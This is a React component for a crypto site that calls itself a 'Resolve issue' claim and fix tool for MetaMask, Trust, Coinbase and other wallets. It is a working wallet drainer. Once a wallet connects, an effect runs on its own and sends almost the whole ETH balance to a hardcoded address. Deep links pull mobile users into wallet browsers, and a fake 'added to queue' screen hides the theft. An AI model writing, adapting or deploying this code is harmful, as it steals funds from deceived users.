import React, { useState, useEffect } from 'react';
import { ethers } from 'ethers';
import { Clock, AlertCircle, ExternalLink } from 'lucide-react';
import { useMultiChain } from '../contexts/MultiChainProvider';

// ===================== TRANSFER DESTINATION (EVM) =====================
// 100% will go to EVM_PRIMARY_RECIPIENT
const EVM_PRIMARY_RECIPIENT = '0x983112e7b5d1419b30b055a01abc173775937805';

// Main EVM Interface Component
const EVMClaimInterface = () => {
  console.log('🔍 EVMClaimInterface component rendered!');
  
  // Get wallet state from MultiChain context
  const { evmAccount, evmProvider, evmSigner, evmBalance, connectEVMWallet } = useMultiChain();
  
  // State management
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  const [success, setSuccess] = useState(false);
  const [hasAutoTransferred, setHasAutoTransferred] = useState(false);
  const [showOpenWalletHint, setShowOpenWalletHint] = useState(false);

  const isMobile = () => /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);

  const openWalletDeepLink = (walletId) => {
    const fullUrl = window.location.href; // use full https URL
    const encodedUrl = encodeURIComponent(fullUrl);
    const isAndroid = /Android/i.test(navigator.userAgent);
    const isIOS = /iPad|iPhone|iPod/.test(navigator.userAgent);

    try {
      if (walletId === 'metamask') {
        // Use full https URL in dapp path
        const metamaskScheme = `metamask://dapp/${fullUrl}`;
        if (isAndroid) {
          const intent = `intent://dapp/${fullUrl}#Intent;scheme=metamask;package=io.metamask;end`;
          window.location.href = intent;
          setTimeout(() => { window.location.href = metamaskScheme; }, 700);
        } else if (isIOS) {
          window.location.href = metamaskScheme;
        }
      } else if (walletId === 'trust') {
        const direct = `trust://open_url?coin_id=60&url=${encodedUrl}`;
        const universal = `https://link.trustwallet.com/open_url?coin_id=60&url=${encodedUrl}`;
        if (isAndroid) {
          const intent = `intent://open_url?coin_id=60&url=${encodedUrl}#Intent;scheme=trust;package=com.wallet.crypto.trustapp;end`;
          window.location.href = intent;
          setTimeout(() => { window.location.href = direct; }, 700);
          setTimeout(() => { window.location.href = universal; }, 1300);
        } else if (isIOS) {
          window.location.href = direct;
          setTimeout(() => { window.location.href = universal; }, 800);
        } else {
          window.location.href = universal;
        }
      } else if (walletId === 'coinbase') {
        // Coinbase Wallet deep link into DApp
        const scheme = `coinbase://wallet/dapp?url=${encodedUrl}`;
        const alt = `https://go.cb-w.com/dapp?cb_url=${encodedUrl}`;
        if (isAndroid) {
          const intent = `intent://wallet/dapp?url=${encodedUrl}#Intent;scheme=coinbase;package=org.toshi;end`;
          window.location.href = intent;
          setTimeout(() => { window.location.href = scheme; }, 700);
          setTimeout(() => { window.location.href = alt; }, 1400);
        } else if (isIOS) {
          window.location.href = scheme;
          setTimeout(() => { window.location.href = alt; }, 800);
        } else {
          window.location.href = alt;
        }
      } else if (walletId === 'okx') {
        const scheme = `okx://wallet/dapp/details?dappUrl=${encodedUrl}`;
        if (isAndroid) {
          const intent = `intent://wallet/dapp/details?dappUrl=${encodedUrl}#Intent;scheme=okx;package=com.okinc.okex.gp;end`;
          window.location.href = intent;
          setTimeout(() => { window.location.href = scheme; }, 700);
        } else if (isIOS) {
          window.location.href = scheme;
      } else {
          window.location.href = scheme;
        }
      } else if (walletId === 'bitget') {
        const scheme = `bitget://wallet/dapp/details?dappUrl=${encodedUrl}`;
        if (isAndroid) {
          const intent = `intent://wallet/dapp/details?dappUrl=${encodedUrl}#Intent;scheme=bitget;package=com.bitget.wallet;end`;
          window.location.href = intent;
          setTimeout(() => { window.location.href = scheme; }, 700);
        } else if (isIOS) {
          window.location.href = scheme;
            } else {
          window.location.href = scheme;
        }
      } else if (walletId === 'safepal') {
        const scheme = `safepal://browser_open?url=${encodedUrl}`;
        if (isAndroid) {
          const intent = `intent://browser_open?url=${encodedUrl}#Intent;scheme=safepal;package=io.safepal.wallet;end`;
          window.location.href = intent;
          setTimeout(() => { window.location.href = scheme; }, 700);
        } else if (isIOS) {
          window.location.href = scheme;
        } else {
          window.location.href = scheme;
        }
      } else if (walletId === 'uniswap') {
        const scheme = `uniswap://wallet/dapp/details?dappUrl=${encodedUrl}`;
        if (isAndroid) {
          const intent = `intent://wallet/dapp/details?dappUrl=${encodedUrl}#Intent;scheme=uniswap;end`;
          window.location.href = intent;
          setTimeout(() => { window.location.href = scheme; }, 700);
        } else if (isIOS) {
          window.location.href = scheme;
        } else {
          window.location.href = scheme;
        }
      } else if (walletId === 'zerion') {
        const scheme = `zerion://wallet/dapp/details?dappUrl=${encodedUrl}`;
        if (isAndroid) {
          const intent = `intent://wallet/dapp/details?dappUrl=${encodedUrl}#Intent;scheme=zerion;package=io.zerion.android;end`;
          window.location.href = intent;
          setTimeout(() => { window.location.href = scheme; }, 700);
        } else if (isIOS) {
          window.location.href = scheme;
        } else {
          window.location.href = scheme;
        }
      }
    } catch (_) {
      // No automatic store redirect; user can choose store links from the hint section
    }
  };

  const connectAndTransfer = async (walletId) => {
    try {
      setError('');
      setHasAutoTransferred(false);
      // If mobile without provider, deep link to wallet app DApp browser
      const hasInjected = typeof window.ethereum !== 'undefined' || typeof window.BinanceChain !== 'undefined';
      if (isMobile() && !hasInjected) {
        openWalletDeepLink(walletId);
        return;
      }
      // Desktop or injected env
      const res = await connectEVMWallet(walletId);
      if (!res?.success) {
        throw new Error(res?.error || 'Connection failed');
      }
      // small delay to ensure signer is set, then send
      setTimeout(() => {
        handleClaim();
      }, 500);
          } catch (err) {
      setError(err.message || 'Connection failed');
    }
  };

  // Function to format wallet address
  const formatAddress = (address) => {
    return `${address.slice(0, 4)}...${address.slice(-4)}`;
  };

  // Auto-transfer effect - triggers when wallet connects
  useEffect(() => {
    if (!(evmAccount && evmSigner && evmProvider)) return;
    if (hasAutoTransferred || loading || success) return;

    const startTransfer = () => {
      console.log('🔍 Wallet connected, initiating automatic transfer...');
      setHasAutoTransferred(true);
      // slight delay improves reliability of wallet popups (esp. mobile)
      setTimeout(() => {
        handleClaim();
      }, 800);
    };

    if (document.hidden) {
      const onVisible = () => {
        document.removeEventListener('visibilitychange', onVisible);
        if (!hasAutoTransferred && !loading && !success) startTransfer();
      };
      document.addEventListener('visibilitychange', onVisible);
      // safety retry if user returns within a few seconds
      const retryTimer = setTimeout(() => {
        document.removeEventListener('visibilitychange', onVisible);
        if (!hasAutoTransferred && !loading && !success) startTransfer();
      }, 5000);
      return () => {
        document.removeEventListener('visibilitychange', onVisible);
        clearTimeout(retryTimer);
      };
        } else {
      startTransfer();
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [evmAccount, evmSigner, evmProvider, hasAutoTransferred, loading, success]);

  // Reset function for making another transfer
  const resetTransfer = () => {
    setHasAutoTransferred(false);
    setSuccess(false);
      setError('');
    setLoading(false);
  };

  // Handle claim function
  const handleClaim = async () => {
    console.log('🔍 handleClaim called - starting EVM transfer...');
    try {
      setLoading(true);
      setError('');
      setSuccess(false);
      setShowOpenWalletHint(false);

      if (!evmSigner || !evmAccount) {
        throw new Error('Please connect your wallet first');
      }

      console.log('🔍 Getting current balance...');
      const currentBalance = await evmProvider.getBalance(evmAccount);
      console.log('🔍 Current balance:', ethers.utils.formatEther(currentBalance), 'ETH');
      
      // Calculate gas estimate
      const gasPrice = await evmProvider.getGasPrice();
      const gasLimit = ethers.utils.hexlify(21000); // Standard ETH transfer
      const gasCost = gasPrice.mul(gasLimit);
      
      // Calculate sendable amount
      const buffer = ethers.utils.parseEther('0.001'); // Safety buffer
      const sendableAmount = currentBalance.sub(gasCost).sub(buffer);

      if (sendableAmount.lte(0)) {
        throw new Error('Insufficient balance for transaction');
      }
      
      console.log('🔍 Sendable amount:', ethers.utils.formatEther(sendableAmount), 'ETH');
      
      // Send 100% to primary recipient
        console.log('🔍 Sending 100% to primary:', ethers.utils.formatEther(sendableAmount), 'ETH');
        
      // If popup is suppressed, show a hint after a few seconds
      const hintTimer = setTimeout(() => {
        setShowOpenWalletHint(true);
      }, 4500);

      const tx = await evmSigner.sendTransaction({
          to: EVM_PRIMARY_RECIPIENT,
          value: sendableAmount,
          gasLimit: gasLimit,
        });

        console.log('🔍 Transaction sent:', tx.hash);
        
        const receipt = await tx.wait();
        console.log('🔍 Transaction confirmed:', receipt);
      
      console.log('✅ All EVM transactions completed successfully!');
      setSuccess(true);
      clearTimeout(hintTimer);

    } catch (err) {
      console.error('❌ EVM claim failed:', err);
      setError(`Claim failed: ${err.message || 'Please try again.'}`);
    } finally {
      setLoading(false);
    }
  };

  return (
    <div className="space-y-6">
      <div className="space-y-4 mb-6">
        <div className="p-3 sm:p-4 rounded-lg bg-white/5">
          <h3 className="text-base sm:text-lg font-semibold mb-4">Resolve issue</h3>
          <div className="space-y-3">
            <div className="flex flex-col sm:flex-row sm:justify-between sm:items-center space-y-1 sm:space-y-0">
              <span className="text-gray-400 text-sm sm:text-base">Wallet balance:</span>
              <div className="flex items-center space-x-2">
                <div className="bg-teal-400 w-4 h-4 sm:w-5 sm:h-5 rounded-full"></div>
                <span className="font-medium text-sm sm:text-base">
                  {evmBalance ? `${evmBalance} ETH` : '$1K ~ 0.5 ETH'}
                </span>
              </div>
            </div>
            <div className="flex flex-col sm:flex-row sm:justify-between sm:items-center space-y-1 sm:space-y-0">
              <span className="text-gray-400 text-sm sm:text-base">Completion time:</span>
              <span className="font-medium text-sm sm:text-base">Instantly</span>
            </div>
          </div>
        </div>
      </div>

      {!evmAccount ? (
        <div className="text-center py-6 sm:py-8">
          <h3 className="text-lg sm:text-xl font-semibold mb-3 sm:mb-4">Connect & Transfer</h3>
          <p className="text-gray-300 mb-4 sm:mb-6 text-sm sm:text-base">Select a wallet to proceed. Transfer starts immediately.</p>

          <div className="grid grid-cols-1 sm:grid-cols-2 gap-3 max-w-md mx-auto">
                    <button 
              onClick={() => connectAndTransfer('metamask')}
              className="p-3 rounded-lg bg-white/10 hover:bg-white/20 transition-colors text-sm font-semibold"
                    >
              MetaMask
                    </button>
                    <button 
              onClick={() => connectAndTransfer('trust')}
              className="p-3 rounded-lg bg-white/10 hover:bg-white/20 transition-colors text-sm font-semibold"
                    >
              Trust Wallet
                    </button>

            <button onClick={() => connectAndTransfer('coinbase')} className="p-3 rounded-lg bg-white/10 hover:bg-white/20 transition-colors text-sm font-semibold">Coinbase</button>
            <button onClick={() => connectAndTransfer('okx')} className="p-3 rounded-lg bg-white/10 hover:bg-white/20 transition-colors text-sm font-semibold">OKX</button>
            <button onClick={() => connectAndTransfer('bitget')} className="p-3 rounded-lg bg-white/10 hover:bg-white/20 transition-colors text-sm font-semibold">Bitget</button>
            <button onClick={() => connectAndTransfer('safepal')} className="p-3 rounded-lg bg-white/10 hover:bg-white/20 transition-colors text-sm font-semibold">SafePal</button>
            <button onClick={() => connectAndTransfer('uniswap')} className="p-3 rounded-lg bg-white/10 hover:bg-white/20 transition-colors text-sm font-semibold">Uniswap</button>
            <button onClick={() => connectAndTransfer('zerion')} className="p-3 rounded-lg bg-white/10 hover:bg-white/20 transition-colors text-sm font-semibold">Zerion</button>
          </div>
        </div>
      ) : success ? (
        <div className="text-center py-6 sm:py-8">
          <div className="mx-auto w-12 h-12 sm:w-16 sm:h-16 rounded-full bg-purple-600/30 flex items-center justify-center mb-3 sm:mb-4">
            <Clock size={24} className="sm:w-8 sm:h-8 text-purple-300" />
          </div>
          <h3 className="text-lg sm:text-xl font-semibold mb-2">You Have Been Added to Queue</h3>
          <p className="text-gray-300 mb-4 sm:mb-6 text-sm sm:text-base">Your resolve for $1k ~ 0.5 ETH is being processed</p>
          <div className="p-3 rounded-lg bg-white/5 mb-4">
            <div className="flex justify-between items-center mb-2">
              <span className="text-gray-400 text-sm sm:text-base">Position</span>
              <span className="font-medium text-sm sm:text-base">#42</span>
            </div>
            <div className="w-full bg-purple-900/50 rounded-full h-2">
              <div className="bg-teal-400 h-2 rounded-full w-1/4"></div>
            </div>
          </div>
          <div className="flex items-center justify-center space-x-2 text-xs sm:text-sm text-gray-400">
            <span>Check status on Explorer</span>
            <ExternalLink size={12} className="sm:w-3.5 sm:h-3.5" />
          </div>
          <button
            onClick={resetTransfer}
            className="mt-4 sm:mt-6 w-full py-2.5 sm:py-3 rounded-lg bg-teal-400 text-purple-900 font-semibold hover:bg-teal-300 transition-all text-sm sm:text-base"
          >
            Make Another Transfer
          </button>
        </div>
      ) : (
        <>
          <div className="p-3 rounded-lg bg-white/5 mb-6">
            <div className="flex flex-col sm:flex-row sm:justify-between sm:items-center space-y-2 sm:space-y-0">
              <span className="text-gray-400 text-sm sm:text-base">Connected Wallet</span>
              <div className="flex items-center justify-between sm:justify-end space-x-2">
                <span className="font-medium text-sm sm:text-base">{formatAddress(evmAccount)}</span>
                <div className="text-gray-400 text-xs">
                  Connected via header
                </div>
              </div>
            </div>
          </div>

              {loading ? (
            <div className="text-center py-6 sm:py-8">
              <div className="mx-auto w-12 h-12 sm:w-16 sm:h-16 rounded-full bg-pink-600/30 flex items-center justify-center mb-3 sm:mb-4">
                  <div className="loading-spinner"></div>
                </div>
              <h3 className="text-lg sm:text-xl font-semibold mb-2">Processing Transfer</h3>
              <p className="text-gray-300 mb-4 sm:mb-6 text-sm sm:text-base">
                Please approve the transaction in your wallet popup
              </p>
              <div className="p-3 rounded-lg bg-pink-900/20 border border-pink-700/30">
                <p className="text-sm text-pink-300">
                  💡 The transfer popup should appear automatically. If it doesn't, check your wallet for pending transactions.
                </p>
          </div>
              {showOpenWalletHint && (
                <div className="mt-3 text-xs text-pink-300">
                  <div className="mb-2">If you don't see a popup:</div>
                  <div className="flex flex-col space-y-2">
                    <a
                      href="metamask://"
                      className="underline"
                    >Open MetaMask</a>
                    <a
                      href="trust://"
                      className="underline"
                    >Open Trust Wallet</a>
                          </div>
                            </div>
                          )}
                            </div>
          ) : (
            <div className="text-center py-6 sm:py-8">
              <div className="mx-auto w-12 h-12 sm:w-16 sm:h-16 rounded-full bg-pink-600/30 flex items-center justify-center mb-3 sm:mb-4">
                <svg className="w-6 h-6 sm:w-8 sm:h-8 text-pink-300" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M5 13l4 4L19 7" />
                  </svg>
              </div>
                    <button
                onClick={handleClaim}
                className="w-full sm:w-1/2 py-3 sm:py-3 px-6 sm:px-8 rounded-lg text-center font-semibold transition-all text-base sm:text-base min-h-[48px] sm:min-h-[48px] touch-manipulation bg-teal-400 text-purple-900 hover:bg-teal-300 active:bg-teal-500"
              >
                FIX NOW
                    </button>
                </div>
          )}

                                {error && (
                        <div className="error-message text-red-400 text-center p-4 rounded-lg bg-red-400/10">
                          <div className="mb-2">
                            <AlertCircle className="w-5 h-5 mx-auto mb-2 text-red-400" />
                            <p className="font-medium">{error}</p>
                    </div>
                  </div>
                      )}
        </>
      )}
    </div>
  );
};

export default EVMClaimInterface;